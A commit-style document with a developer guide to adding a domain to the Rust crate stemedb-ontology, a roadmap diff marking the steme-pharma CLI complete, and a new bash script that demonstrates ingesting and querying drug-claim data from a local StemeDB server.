
This guide walks you through implementing a new domain (vertical) in the stemedb-ontology crate. By the end, you'll have a working domain with entity types, predicate schemas, and optional extractors.

**Time:** ~30 minutes
**Prerequisites:** Rust knowledge, familiarity with StemeDB concepts

## Overview

A domain in stemedb-ontology defines:

1. **Entity Types** - The kinds of things in your domain (e.g., Drug, Company, Asset)
2. **Predicate Schemas** - How subjects are built for different predicate categories
3. **Source Hierarchy** - How to weight different source authorities
4. **Extractors (optional)** - Code that extracts claims from external sources

## Step 1: Plan Your Domain Model

Before writing code, answer these questions:

### What entities exist in your domain?

| Entity | Description | Example Values |
|--------|-------------|----------------|
| ? | ? | ? |

**Pharma example:**

| Entity | Description | Example Values |
|--------|-------------|----------------|
| Drug | Pharmaceutical compound | Semaglutide, Tirzepatide |
| Indication | Medical condition | Type2Diabetes, Obesity |
| Target | Molecular target | GLP1R, GIPR |

### What predicates will you track?

Group predicates by category (determines subject pattern):

| Category | Subject Pattern | Example Predicates |
|----------|-----------------|-------------------|
| ? | ? | ? |

**Pharma example:**

| Category | Subject Pattern | Example Predicates |
|----------|-----------------|-------------------|
| Efficacy | `{Drug}:{Indication}` | hba1c_reduction_percent, weight_loss_percent |
| Safety | `{Drug}` | nausea_rate, has_boxed_warning |
| Mechanism | `{Drug}:{Target}` | binding_affinity, mechanism_of_action |

### What sources will provide data?

Order from most to least authoritative:

| Tier | Source Class | Examples | Weight |
|------|--------------|----------|--------|
| 0 | Regulatory | ? | 1.0 |
| 1 | Clinical | ? | 0.9 |
| ... | ... | ... | ... |

## Step 2: Create Domain Module

Create the directory structure:

```
crates/stemedb-ontology/src/
  {domain}/
    mod.rs           # Re-exports
    definition.rs    # Domain::new() builder
```

### Template: `{domain}/mod.rs`

```rust
//! {Domain} domain ontology.
//!
//! This module defines the {domain} vertical with:
//! - Entity types (...)
//! - Predicate schemas (...)
//! - Source hierarchy (...)

pub mod definition;

pub use definition::definition;

// Re-export domain-specific types if any
// pub use definition::{...};
```

### Template: `{domain}/definition.rs`

```rust
//! Compiled-in {domain} domain definition.

use crate::domain::{
    DefaultLens, Domain, EntityType, NamingConvention, PredicateSchema, SourceTier,
};
use stemedb_core::types::SourceClass;

/// Build the {domain} domain definition.
pub fn definition() -> Domain {
    let mut domain = Domain::new(
        "{Domain}",
        "Description of what this domain covers",
    );

    // -------------------------------------------------------------------------
    // Entity Types
    // -------------------------------------------------------------------------

    // Primary entity (e.g., the main subject of claims)
    domain = domain.with_entity_type(
        "{PrimaryEntity}",
        EntityType::required("Description")
            .with_naming(NamingConvention::CamelCase)
            // Add aliases for common variations
            .with_alias("ALIAS", "Canonical"),
    );

    // Secondary entity (for compound subjects)
    domain = domain.with_entity_type(
        "{SecondaryEntity}",
        EntityType::required("Description")
            .with_naming(NamingConvention::CamelCase),
    );

    // -------------------------------------------------------------------------
    // Predicate Schemas
    // -------------------------------------------------------------------------

    // Category 1: Primary predicates (single entity subject)
    domain = domain.with_predicate_schema(
        "category1",
        PredicateSchema::new(
            "Description of this predicate category",
            "{PrimaryEntity}",
        )
        .with_predicates(vec![
            "predicate_one",
            "predicate_two",
        ])
        .with_default_lens(DefaultLens::Recency),
    );

    // Category 2: Compound predicates (multi-entity subject)
    domain = domain.with_predicate_schema(
        "category2",
        PredicateSchema::new(
            "Description",
            "{PrimaryEntity}:{SecondaryEntity}",
        )
        .with_predicates(vec![
            "compound_predicate",
        ])
        .with_default_lens(DefaultLens::LayeredConsensus),
    );

    // -------------------------------------------------------------------------
    // Source Hierarchy
    // -------------------------------------------------------------------------

    domain = domain.with_source_hierarchy(vec![
        SourceTier::new(SourceClass::Regulatory, "Tier 0: Official Sources")
            .with_examples(vec!["Government agencies", "Standards bodies"])
            .with_weight(1.0),
        SourceTier::new(SourceClass::Clinical, "Tier 1: Primary Research")
            .with_examples(vec!["Peer-reviewed journals", "Research institutions"])
            .with_weight(0.9)
            .with_decay(730), // 2 year half-life
        SourceTier::new(SourceClass::Observational, "Tier 2: Secondary Analysis")
            .with_examples(vec!["Industry reports", "Analyst research"])
            .with_weight(0.7)
            .with_decay(365),
        SourceTier::new(SourceClass::Expert, "Tier 3: Expert Opinion")
            .with_examples(vec!["Industry experts", "Consultants"])
            .with_weight(0.5)
            .with_decay(180),
        SourceTier::new(SourceClass::Community, "Tier 4: Community")
            .with_examples(vec!["Professional forums", "Curated discussions"])
            .with_weight(0.3)
            .with_decay(90),
        SourceTier::new(SourceClass::Anecdotal, "Tier 5: Anecdotal")
            .with_examples(vec!["Social media", "Blog posts"])
            .with_weight(0.1)
            .with_decay(30),
    ]);

    domain
}

#[cfg(test)]
mod tests {
    use super::*;

    #[test]
    fn test_definition_builds() {
        let domain = definition();
        assert_eq!(domain.name, "{Domain}");
        assert!(!domain.entity_types.is_empty());
        assert!(!domain.predicate_schemas.is_empty());
        assert!(!domain.source_hierarchy.is_empty());
    }

    #[test]
    fn test_entity_normalization() {
        let domain = definition();
        let entity = domain.get_entity_type("{PrimaryEntity}").expect("entity exists");

        // Test alias normalization
        assert_eq!(entity.normalize("ALIAS"), "Canonical");
        assert_eq!(entity.normalize("Canonical"), "Canonical");
    }

    #[test]
    fn test_predicate_schema_lookup() {
        let domain = definition();

        // Direct lookup
        let schema = domain.get_schema("category1").expect("schema exists");
        assert_eq!(schema.subject_pattern, "{PrimaryEntity}");

        // Lookup by predicate
        let schema = domain.schema_for_predicate("predicate_one").expect("found");
        assert!(schema.predicates.contains(&"predicate_one".to_string()));
    }
}
```

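The template comments `with_decay(730)` as a two-year half-life. As a rough sketch of what a half-life implies, assuming the argument is a half-life in days and that decay is plain exponential halving (the function `decayed_weight` is hypothetical, and StemeDB's actual decay computation may differ):

```rust
/// Hypothetical illustration of half-life decay:
/// the weight halves every `half_life_days` days.
fn decayed_weight(base_weight: f64, half_life_days: f64, age_days: f64) -> f64 {
    base_weight * 0.5_f64.powf(age_days / half_life_days)
}

fn main() {
    // Tier 1 (weight 0.9, 730-day half-life) after exactly one half-life.
    let clinical = decayed_weight(0.9, 730.0, 730.0);
    // Tier 5 (weight 0.1, 30-day half-life) after six half-lives.
    let anecdotal = decayed_weight(0.1, 30.0, 180.0);
    println!("clinical: {:.4}, anecdotal: {:.6}", clinical, anecdotal);
}
```

Under these assumptions, shorter half-lives on the lower tiers mean that old anecdotal claims fade quickly, while the regulatory tier in the template sets no decay at all.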
## Step 3: Implement Extractors (Optional)

If your domain has external data sources, implement the `MedicalExtractor` trait.

### Directory Structure

```
crates/stemedb-ontology/src/
  {domain}/
    mod.rs
    definition.rs
    extractors/
      mod.rs
      {source}.rs
```

### Template: `{domain}/extractors/mod.rs`

```rust
//! Data extractors for {domain}.

mod {source};

pub use {source}::{Source}Extractor;

// Re-export the shared extractor types, which live in the pharma module
pub use crate::pharma::extractors::{
    ExtractError, MedicalClaim, MedicalExtractor, RetryConfig, SourceInput,
};
```

### Template: `{domain}/extractors/{source}.rs`

```rust
//! {Source} data extractor.

use super::{ExtractError, MedicalClaim, MedicalExtractor, SourceInput};
use async_trait::async_trait;
use stemedb_core::types::{ObjectValue, SourceClass};

/// Extractor for {Source} data.
pub struct {Source}Extractor {
    http_client: reqwest::Client,
    base_url: String,
}

impl {Source}Extractor {
    /// Create a new extractor.
    pub fn new() -> Self {
        Self {
            http_client: reqwest::Client::new(),
            base_url: "https://api.example.com".to_string(),
        }
    }
}

impl Default for {Source}Extractor {
    fn default() -> Self {
        Self::new()
    }
}

#[async_trait]
impl MedicalExtractor for {Source}Extractor {
    fn name(&self) -> &str {
        "{Source} Extractor"
    }

    fn source_class(&self) -> SourceClass {
        SourceClass::Regulatory // Adjust based on source authority
    }

    fn can_handle(&self, source: &SourceInput) -> bool {
        matches!(source, SourceInput::DrugName(_) | SourceInput::Url(_))
    }

    async fn extract(&self, source: &SourceInput) -> Result<Vec<MedicalClaim>, ExtractError> {
        let query = match source {
            SourceInput::DrugName(name) => name.clone(),
            SourceInput::Url(url) => url.clone(),
            _ => return Err(ExtractError::NotFound("Unsupported input type".into())),
        };

        // Fetch data from source
        let url = format!("{}/search?q={}", self.base_url, urlencoding::encode(&query));
        let response = self.http_client.get(&url).send().await?;

        if !response.status().is_success() {
            return Err(ExtractError::ApiError(format!(
                "HTTP {}", response.status()
            )));
        }

        // Parse response and extract claims
        let mut claims = Vec::new();

        // Example claim
        claims.push(
            MedicalClaim::new(
                "Subject",
                "predicate_name",
                ObjectValue::Number(42.0),
            )
            .with_confidence(0.9)
            .with_source_url(&url)
            .with_source_section("Section Name")
            .with_quote("Supporting quote from source")
            .with_source_class(self.source_class())
        );

        Ok(claims)
    }
}
```

## Step 4: Create CLI Binary (Optional)

For user-facing domains, create a CLI tool.

### Template: `src/bin/steme_{domain}.rs`

```rust
//! CLI for {domain} domain operations.

use clap::Parser;
use stemedb_ontology::client::StemeClient;
use stemedb_ontology::{domain}::definition;

mod cli;
mod commands;

#[derive(Parser)]
#[command(name = "steme-{domain}")]
#[command(about = "{Domain} data operations for StemeDB")]
struct Cli {
    #[arg(long, default_value = "http://localhost:18180")]
    server: String,

    #[command(subcommand)]
    command: Commands,
}

#[derive(clap::Subcommand)]
enum Commands {
    /// Ingest data
    Ingest { /* args */ },
    /// Query data
    Query { /* args */ },
}

#[tokio::main]
async fn main() -> Result<(), Box<dyn std::error::Error>> {
    let cli = Cli::parse();
    let client = StemeClient::new(&cli.server);

    match cli.command {
        Commands::Ingest { /* args */ } => {
            // Implementation
        }
        Commands::Query { /* args */ } => {
            // Implementation
        }
    }

    Ok(())
}
```

## Step 5: Testing Checklist

Before considering your domain complete:

- [ ] `cargo build -p stemedb-ontology` succeeds
- [ ] `definition()` returns a valid Domain
- [ ] All entity types have meaningful descriptions
- [ ] All predicate schemas have correct subject patterns
- [ ] Entity normalization works (aliases resolve correctly)
- [ ] `schema_for_predicate()` finds the right schema
- [ ] Source hierarchy has 6 tiers with decreasing weights
- [ ] (If extractors) `cargo test -p stemedb-ontology` passes

Run the tests:

```bash
cargo test -p stemedb-ontology
cargo clippy -p stemedb-ontology -- -D warnings
```

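The checklist item on tier weights can be turned into an automated check. The sketch below works on a plain slice of weights so that it stays self-contained; the helper `weights_strictly_decreasing` is hypothetical, and wiring it to the real `Domain::source_hierarchy` field is left out because that field's element type is not shown in this guide.

```rust
/// Hypothetical helper: true when each tier weighs strictly less than the one before it.
fn weights_strictly_decreasing(weights: &[f32]) -> bool {
    weights.windows(2).all(|pair| pair[0] > pair[1])
}

fn main() {
    // Weights from the six-tier hierarchy used throughout this guide.
    let tiers = [1.0, 0.9, 0.7, 0.5, 0.3, 0.1];
    assert_eq!(tiers.len(), 6);
    assert!(weights_strictly_decreasing(&tiers));

    // A hierarchy with two equal tiers should be rejected.
    assert!(!weights_strictly_decreasing(&[1.0, 0.9, 0.9]));
    println!("tier weights look consistent");
}
```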
## Step 6: Integration

### Export from lib.rs

Edit `crates/stemedb-ontology/src/lib.rs`:

```rust
// Add your domain module
pub mod {domain};

// Re-export for convenience
pub use {domain}::definition as {domain}_domain;
```

### Update ai-lookup

Add an entry to `ai-lookup/index.md` under the Domain Ontology section.

### Update CLAUDE.md routing (if significant)

If your domain is frequently used, add a routing entry to the Find Your Guide table.

## Complete Example: Cardiology Domain (Skeleton)

Here's a minimal working example for a cardiology domain:

```rust
// crates/stemedb-ontology/src/cardiology/mod.rs
//! Cardiology domain ontology.

pub mod definition;
pub use definition::definition;
```

```rust
// crates/stemedb-ontology/src/cardiology/definition.rs
use crate::domain::{DefaultLens, Domain, EntityType, NamingConvention, PredicateSchema, SourceTier};
use stemedb_core::types::SourceClass;

pub fn definition() -> Domain {
    let mut domain = Domain::new(
        "Cardiology",
        "Cardiovascular conditions, procedures, and outcomes",
    );

    // Entities
    domain = domain
        .with_entity_type(
            "Condition",
            EntityType::required("Cardiovascular condition")
                .with_naming(NamingConvention::CamelCase)
                .with_alias("MI", "MyocardialInfarction")
                .with_alias("CHF", "CongestiveHeartFailure")
                .with_alias("AF", "AtrialFibrillation"),
        )
        .with_entity_type(
            "Procedure",
            EntityType::required("Medical procedure")
                .with_naming(NamingConvention::CamelCase)
                .with_alias("CABG", "CoronaryArteryBypassGraft")
                .with_alias("PCI", "PercutaneousCoronaryIntervention"),
        )
        .with_entity_type(
            "Biomarker",
            EntityType::required("Diagnostic biomarker")
                .with_naming(NamingConvention::CamelCase),
        );

    // Schemas
    domain = domain
        .with_predicate_schema(
            "diagnosis",
            PredicateSchema::new("Diagnostic criteria", "{Condition}")
                .with_predicates(vec![
                    "diagnostic_criteria",
                    "staging_system",
                    "severity_classification",
                ])
                .with_default_lens(DefaultLens::Authority),
        )
        .with_predicate_schema(
            "outcome",
            PredicateSchema::new("Treatment outcomes", "{Condition}:{Procedure}")
                .with_predicates(vec![
                    "mortality_rate",
                    "complication_rate",
                    "readmission_rate",
                    "length_of_stay_days",
                ])
                .with_default_lens(DefaultLens::LayeredConsensus),
        )
        .with_predicate_schema(
            "biomarker",
            PredicateSchema::new("Biomarker thresholds", "{Biomarker}")
                .with_predicates(vec![
                    "normal_range",
                    "diagnostic_threshold",
                    "prognostic_value",
                ])
                .with_default_lens(DefaultLens::Consensus),
        );

    // Source hierarchy
    domain = domain.with_source_hierarchy(vec![
        SourceTier::new(SourceClass::Regulatory, "Tier 0: Guidelines")
            .with_examples(vec!["ACC/AHA Guidelines", "ESC Guidelines"])
            .with_weight(1.0),
        SourceTier::new(SourceClass::Clinical, "Tier 1: Clinical Trials")
            .with_examples(vec!["Landmark RCTs", "Meta-analyses"])
            .with_weight(0.9)
            .with_decay(730),
        SourceTier::new(SourceClass::Observational, "Tier 2: Registries")
            .with_examples(vec!["NCDR", "Get With The Guidelines"])
            .with_weight(0.7)
            .with_decay(365),
        SourceTier::new(SourceClass::Expert, "Tier 3: Expert Consensus")
            .with_examples(vec!["Consensus statements", "Textbooks"])
            .with_weight(0.5)
            .with_decay(180),
        SourceTier::new(SourceClass::Community, "Tier 4: Community")
            .with_examples(vec!["Medical forums", "CME discussions"])
            .with_weight(0.3)
            .with_decay(90),
        SourceTier::new(SourceClass::Anecdotal, "Tier 5: Anecdotal")
            .with_examples(vec!["Case reports", "Social media"])
            .with_weight(0.1)
            .with_decay(30),
    ]);

    domain
}

#[cfg(test)]
mod tests {
    use super::*;

    #[test]
    fn test_cardiology_domain() {
        let domain = definition();
        assert_eq!(domain.name, "Cardiology");

        // Check entity aliases
        let condition = domain.get_entity_type("Condition").unwrap();
        assert_eq!(condition.normalize("MI"), "MyocardialInfarction");

        // Check schema lookup
        let schema = domain.schema_for_predicate("mortality_rate").unwrap();
        assert_eq!(schema.subject_pattern, "{Condition}:{Procedure}");
    }
}
```

## Troubleshooting

### "Unknown predicate" errors

Your predicate isn't in any schema. Add it to the appropriate `with_predicates()` call.

### Subject collision issues

If claims that should conflict aren't conflicting, check that:

1. The subject pattern matches your intent
2. Entity values are being normalized consistently
3. The predicate is in the right schema category

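Inconsistent normalization is the easiest of these to reproduce. The sketch below uses a plain alias map rather than the crate's `EntityType`; the helpers `normalize`, `subject`, and `cardiology_aliases` are hypothetical and only mirror the alias behaviour exercised by the tests earlier in this guide.

```rust
use std::collections::HashMap;

/// Hypothetical alias table, using aliases from the cardiology example.
fn cardiology_aliases() -> HashMap<&'static str, &'static str> {
    HashMap::from([
        ("MI", "MyocardialInfarction"),
        ("PCI", "PercutaneousCoronaryIntervention"),
    ])
}

/// Map an alias to its canonical name; unknown values pass through unchanged.
fn normalize(aliases: &HashMap<&str, &str>, raw: &str) -> String {
    aliases.get(raw).copied().unwrap_or(raw).to_string()
}

/// Build a `{Condition}:{Procedure}` subject from normalized parts.
fn subject(aliases: &HashMap<&str, &str>, condition: &str, procedure: &str) -> String {
    format!("{}:{}", normalize(aliases, condition), normalize(aliases, procedure))
}

fn main() {
    let aliases = cardiology_aliases();

    // Two sources spell the same entities differently.
    let from_registry = subject(&aliases, "MI", "PCI");
    let from_trial = subject(&aliases, "MyocardialInfarction", "PercutaneousCoronaryIntervention");

    // After normalization both claims share one subject, so they can collide.
    assert_eq!(from_registry, from_trial);

    // Without normalization the raw strings differ and the claims never meet.
    assert_ne!("MI:PCI", from_trial);
    println!("{}", from_registry);
}
```

If one ingestion path skips this step, its claims are stored under a different subject string and the conflict never surfaces.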
### Extractor not finding data

1. Check that the API URL is correct
2. Verify that the query parameters match the API's expectations
3. Add debug logging to see raw responses

## Next Steps

- Run the Consumer Health UAT to see the pharma domain in action
- Read the [Lens documentation](../services/lens.md) to understand conflict resolution
- Check the [SDK guide](../../ai-lookup/services/sdk.md) for Go integration
||||
20
roadmap.md
@@ -44,7 +44,7 @@
| **Time Travel Works** | `as_of=2024-01-01` returns historical snapshot | ✅ Infrastructure ready |
| **Decay Works** | 6-month-old Reddit claim has lower effective confidence than fresh FDA | ✅ Infrastructure ready |
| **UAT Passes** | Consumer Health scenarios documented and verified | ✅ Week 4 |
| **Self-Serve Demo** | CLI tool lets anyone explore without code | 🚧 Week 5 |
| **Self-Serve Demo** | CLI tool lets anyone explore without code | ✅ Week 5 |

### The Demo Script

@@ -76,7 +76,7 @@
| **Week 2** ✅ | FDA extractor, claim-to-assertion signing | Ontology | Week 1 |
| **Week 3** ✅ | Ingest FDA claims, mock conflicts, SkepticLens demo | Ontology | Week 2 |
| **Week 4** ✅ | UAT scenarios documented and verified | Ontology | Week 3 |
| **Week 5** | `steme-pharma` CLI for self-serve exploration | Ontology | Week 3 |
| **Week 5** ✅ | `steme-pharma` CLI for self-serve exploration | Ontology | Week 3 |
| **Week 6** | Polish, factor out reusable patterns, document | Ontology | Week 4-5 |

### What's NOT in MVP
@@ -1346,11 +1346,10 @@ These are valuable but not required to prove the core value proposition:
* [x] **Week 2**: FDA Extractor + Signing — `FdaLabelExtractor`, `MedicalClaim::to_assertion()`, exponential backoff. ✅ COMPLETE
* [x] **Week 3**: StemeDB Integration — `StemeClient`, `pharma-ingest` CLI, mock conflict demo. ✅ COMPLETE
* [x] **Week 4**: UAT Scenarios — Document acceptance criteria, validation tests. ✅ COMPLETE
* [ ] **Week 5**: CLI Tool — `steme-pharma` CLI for ingest/query/compare.
* [x] **Week 5**: CLI Tool — `steme-pharma` CLI for ingest/query/compare. ✅ COMPLETE
* [ ] **Week 6**: Generalization — Factor out reusable patterns, document "Adding a Domain".

### Next Up
* **Week 5 MVP**: Full `steme-pharma` CLI with query, compare, and explore commands.
* **Week 6 MVP**: Factor out reusable patterns, document "Adding a Domain" guide.
* **Phase 8B-C** (deferred): Observability, geo-distribution — production concerns, not MVP blockers.

@@ -1363,6 +1362,14 @@ These are valuable but not required to prove the core value proposition:
* **Agent Wallet** (Key management sidecar) -> App layer.

### Recently Completed
* [x] **🎯 MVP Week 5**: `steme-pharma` CLI for self-serve exploration.
    * Full CLI binary with 5 subcommands: `ingest`, `query`, `compare`, `explore`, `validate`.
    * Query modes: `skeptic` (default), `layered` (per-tier), and lens-based (recency, consensus, etc.).
    * Table and JSON output formats via `comfy-table`.
    * Client extensions: `layered()`, `query()`, `list_predicates()` methods.
    * Response DTOs: `LayeredResponse`, `QueryResponse`, `AssertionDto`, `TierResolutionDto`.
    * Domain validation for known pharma predicates and subject patterns.
    * Modular design: cli.rs, commands.rs, helpers.rs, output.rs.
* [x] **🎯 MVP Week 4**: UAT scenarios documented and verified.
    * Integration test suite: `crates/stemedb-ontology/tests/consumer_health_uat.rs`
    * 4 automated UAT scenarios with real Ed25519 signing
@@ -1597,7 +1604,10 @@ INFRASTRUCTURE (Complete) VERTICAL INTEGRATION (In Progress)
[stemedb-ontology Weeks 1-3] ✅ ───────────────────────┘
(Domain defs, FDA extractor, StemeClient) |
v
[MVP Week 5: CLI Tool] [ ]
[MVP Week 5: CLI Tool] ✅
|
v
[MVP Week 6: Polish & Docs] [ ]
|
v
🎯 CONSUMER HEALTH MVP

239
scripts/demo-consumer-health.sh
Executable file
@@ -0,0 +1,239 @@
#!/usr/bin/env bash
# Consumer Health Demo Script
# Demonstrates StemeDB + stemedb-ontology for the Consumer Health use case
#
# Prerequisites:
#   - StemeDB API running: cargo run -p stemedb-api
#   - steme-pharma built (release, matching PHARMA_CLI below): cargo build --release -p stemedb-ontology
#
# Usage:
#   ./scripts/demo-consumer-health.sh

set -e

# Colors
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
BOLD='\033[1m'
NC='\033[0m' # No Color

# Configuration
STEMEDB_URL="${STEMEDB_URL:-http://localhost:18180}"
PHARMA_CLI="./target/release/steme-pharma"
PAUSE_SECONDS=2

# Helper functions
print_header() {
    echo -e "\n${BOLD}${BLUE}════════════════════════════════════════════════════════════════${NC}"
    echo -e "${BOLD}${BLUE} $1${NC}"
    echo -e "${BOLD}${BLUE}════════════════════════════════════════════════════════════════${NC}\n"
}

print_step() {
    echo -e "${CYAN}▶ $1${NC}"
}

print_success() {
    echo -e "${GREEN}✓ $1${NC}"
}

print_warning() {
    echo -e "${YELLOW}⚠ $1${NC}"
}

print_error() {
    echo -e "${RED}✗ $1${NC}"
}

# Pause for Enter when run interactively; otherwise sleep briefly.
wait_for_user() {
    if [ -t 0 ]; then
        echo -e "\n${YELLOW}Press Enter to continue...${NC}"
        read -r
    else
        sleep "$PAUSE_SECONDS"
    fi
}

# Check prerequisites
print_header "Consumer Health Demo - Prerequisites Check"

# Check if steme-pharma exists
if [ ! -f "$PHARMA_CLI" ]; then
    print_warning "steme-pharma not found at $PHARMA_CLI"
    print_step "Building steme-pharma..."
    cargo build --release -p stemedb-ontology
fi

# Check if StemeDB is running
# -f makes curl exit non-zero on HTTP errors (4xx/5xx), not only on connection failures
print_step "Checking StemeDB connection..."
if curl -sf "${STEMEDB_URL}/v1/health" > /dev/null 2>&1; then
    print_success "StemeDB is running at $STEMEDB_URL"
else
    print_error "StemeDB not reachable at $STEMEDB_URL"
    echo -e "\nStart StemeDB with:"
    echo -e " ${CYAN}cargo run -p stemedb-api${NC}"
    exit 1
fi

# ============================================================================
# STEP 1: Ingest FDA Data + Mock Conflicts
# ============================================================================
print_header "Step 1: Ingest FDA Data + Mock Conflicts"

print_step "Ingesting FDA label data for Semaglutide and Tirzepatide..."
print_step "Adding mock conflicts (simulating social media contradictions)..."
echo ""

"$PHARMA_CLI" --stemedb-url "$STEMEDB_URL" ingest "semaglutide,tirzepatide" --with-conflicts

print_success "Data ingested with mock conflicts"
wait_for_user

# ============================================================================
# STEP 2: Conflict Detection (Skeptic Lens)
# ============================================================================
print_header "Step 2: Conflict Detection (Skeptic Lens)"

echo -e "${BOLD}Question:${NC} What do different sources say about Semaglutide's nausea rate?"
echo -e "${BOLD}Lens:${NC} Skeptic (shows all claims, highlights disagreements)\n"

print_step "Querying nausea_rate with Skeptic lens..."
echo ""

"$PHARMA_CLI" --stemedb-url "$STEMEDB_URL" query "Semaglutide" "nausea_rate" --mode skeptic

echo -e "\n${YELLOW}Note:${NC} The conflict score indicates disagreement between sources."
echo -e "FDA (Regulatory tier) reports clinical trial data."
echo -e "Reddit (Anecdotal tier) reports user experiences."
wait_for_user

# ============================================================================
# STEP 3: Source Hierarchy (Layered Consensus)
# ============================================================================
print_header "Step 3: Source Hierarchy (Layered Consensus)"

echo -e "${BOLD}Question:${NC} What's the consensus on HbA1c reduction, broken down by source tier?"
echo -e "${BOLD}Lens:${NC} LayeredConsensus (shows per-tier agreement)\n"

print_step "Querying hba1c_reduction_percent with Layered Consensus..."
echo ""

"$PHARMA_CLI" --stemedb-url "$STEMEDB_URL" query "Semaglutide:Type2Diabetes" "hba1c_reduction_percent" --mode layered

echo -e "\n${YELLOW}Note:${NC} Each tier shows its own consensus."
echo -e "Higher tiers (Regulatory, Clinical) have more weight in final resolution."
wait_for_user

# ============================================================================
# STEP 4: Drug Comparison
# ============================================================================
print_header "Step 4: Drug Comparison"

echo -e "${BOLD}Question:${NC} How do Semaglutide and Tirzepatide compare on weight loss?"
echo -e "${BOLD}Method:${NC} Side-by-side query of both subjects\n"

print_step "Comparing weight_loss_percent..."
echo ""

"$PHARMA_CLI" --stemedb-url "$STEMEDB_URL" compare \
    "Semaglutide:Type2Diabetes" \
    "Tirzepatide:Type2Diabetes" \
    --predicate "weight_loss_percent"

echo -e "\n${YELLOW}Note:${NC} Both drugs' claims are shown with conflict scores."
echo -e "A consumer can see both FDA data and community reports."
wait_for_user

# ============================================================================
# STEP 5: Explore Available Data
# ============================================================================
print_header "Step 5: Explore Available Data"

echo -e "${BOLD}Question:${NC} What predicates are available for Semaglutide?"
echo -e "${BOLD}Method:${NC} List all predicates with assertions for this subject\n"

print_step "Exploring Semaglutide predicates..."
echo ""

"$PHARMA_CLI" --stemedb-url "$STEMEDB_URL" explore "Semaglutide:Type2Diabetes"

echo ""

print_step "Exploring Semaglutide safety predicates..."
echo ""

"$PHARMA_CLI" --stemedb-url "$STEMEDB_URL" explore "Semaglutide"

echo -e "\n${YELLOW}Note:${NC} Efficacy predicates use Drug:Indication subjects."
echo -e "Safety predicates use Drug-only subjects (apply across indications)."
wait_for_user

# ============================================================================
# STEP 6: JSON Output (for Integration)
# ============================================================================
print_header "Step 6: JSON Output (for Integration)"

echo -e "${BOLD}Use Case:${NC} Programmatic access for AI agents or web apps"
echo -e "${BOLD}Format:${NC} JSON output for parsing\n"

print_step "Getting JSON response..."
echo ""

"$PHARMA_CLI" --stemedb-url "$STEMEDB_URL" --format json query "Semaglutide" "nausea_rate" | head -50

echo -e "\n... (truncated for demo)"
wait_for_user

# ============================================================================
# Summary
# ============================================================================
print_header "Demo Summary"

echo -e "${GREEN}${BOLD}What We Demonstrated:${NC}\n"

echo -e " 1. ${CYAN}Data Ingestion${NC}"
echo -e " - FDA label extraction (Regulatory tier)"
echo -e " - Mock social media conflicts (Anecdotal tier)"
echo ""

echo -e " 2. ${CYAN}Conflict Detection${NC}"
echo -e " - Skeptic lens shows ALL claims"
echo -e " - Conflict score quantifies disagreement"
echo ""

echo -e " 3. ${CYAN}Source Hierarchy${NC}"
echo -e " - LayeredConsensus groups by authority tier"
echo -e " - FDA data weighted higher than Reddit"
echo ""

echo -e " 4. ${CYAN}Drug Comparison${NC}"
echo -e " - Side-by-side view of multiple subjects"
echo -e " - Each drug's claims with provenance"
echo ""

echo -e " 5. ${CYAN}Data Exploration${NC}"
echo -e " - Discover available predicates"
echo -e " - Different subject patterns for efficacy vs safety"
echo ""

echo -e " 6. ${CYAN}API Integration${NC}"
echo -e " - JSON output for programmatic access"
echo -e " - Ready for AI agents and web apps"
echo ""

echo -e "${BOLD}Consumer Health Value Proposition:${NC}"
echo -e " - ${GREEN}See all perspectives${NC}, not just the loudest"
echo -e " - ${GREEN}Understand source authority${NC} (FDA vs. Reddit)"
echo -e " - ${GREEN}Make informed decisions${NC} with conflict awareness"
echo ""

echo -e "${BOLD}Next Steps:${NC}"
echo -e " - Run Consumer Health UAT: ${CYAN}cargo test -p stemedb-ontology --test consumer_health_uat${NC}"
echo -e " - Read the guide: ${CYAN}docs/app-concepts/consumer-health.md${NC}"
echo -e " - Try the Go SDK: ${CYAN}sdk/go/steme/${NC}"
echo ""

print_success "Demo complete!"